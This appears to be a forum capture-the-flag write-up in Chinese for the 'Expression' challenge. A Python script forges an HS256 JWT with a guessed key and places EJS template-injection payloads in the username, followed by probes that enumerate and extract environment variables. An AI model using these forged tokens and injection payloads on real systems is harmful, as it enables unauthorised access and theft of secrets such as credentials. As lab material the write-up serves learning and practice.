Expression WP

yakusha1379,2026-06-01 14:01

破解签名密钥的内容另外的wp都有，这边补充下那个脚本的ssti一段

Plaintext

import jwt, time

Plaintext

  payload = {
      "email": "test@test.com",
      "username": "<%= Object.keys(process.env).filter(k=>/flag/i.test(k)).map(k=>k+'='+process.env[k]).join('\n') %>",
      "iat": int(time.time()),
      "exp": int(time.time()) + 86400 * 7
  }

Plaintext

  token = jwt.encode(payload, "secret", algorithm="HS256")
  print(token)

然后把请求包改成：
Cookie: token=上面生成的token

验证 SSTI：

<%= 7*7 %>

验证可用对象：

<%= process.version %>

枚举敏感数据入口：

<%= Object.keys(process.env).join(',') %>

精确提取 flag：

<%= Object.keys(process.env).filter(k=>/flag/i.test(k)).map(k=>k+'='+process.env[k]).join('\n') %>

暂无回复。你的想法是什么？

Expression WP

顶级玩家发起

极客大挑战2023-Crypto-SignIn WP -

jii 发起

HELP!!